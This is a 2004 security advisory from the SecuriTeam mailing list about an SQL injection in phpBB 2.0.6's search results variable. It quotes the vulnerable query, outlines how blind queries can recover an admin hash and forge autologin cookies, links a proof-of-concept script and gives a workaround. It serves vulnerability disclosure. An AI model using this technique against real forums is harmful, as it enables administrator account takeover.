Date: 25 Mar 2004 16:54:46 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] PhpBB SQL Injection In Search Results Variable
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PhpBB SQL Injection In Search Results Variable
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/>; phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."
An SQL injection vulnerability exists in phpBB when register_globals is
set to "on" via the search results variable.
DETAILS
Vulnerable Systems:
* phpBB version 2.0.6
An SQL injection exists in the $search_results variable when performing a
search in phpBB, on line 711 when the $show_results variable is not set to
'posts' or `topics':
$sql = "SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username
AS post_username2, p2.post_time
FROM " . TOPICS_TABLE . " t, " .
FORUMS_TABLE . " f, " . USERS_TABLE .
" u, " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2, " . USERS_TABLE . " u2
WHERE t.topic_id IN
($search_results)
AND t.topic_poster =
u.user_id
AND f.forum_id =
t.forum_id
AND p.post_id =
t.topic_first_post_id
AND p2.post_id =
t.topic_last_post_id
AND u2.user_id =
p2.poster_id";
One of the tables used in the SELECT query is the users table. This can be
used to determine the admin's hash by guessing whether certain queries are
true or false with search results from MySQL 3. Once the admin's hash is
known and taking advantage of phpBB's autologin feature, one can forge
cookies and login as the administrator without needing to crack the
password.
A proof of concept script can be found at
<http://www.scan-associates.net/papers/gemuruh-v2.php.txt>;
http://www.scan-associates.net/papers/gemuruh-v2.php.txt.
Workaround
Turn off register_globals in the PHP configuration file.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:[email protected]> pokley.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
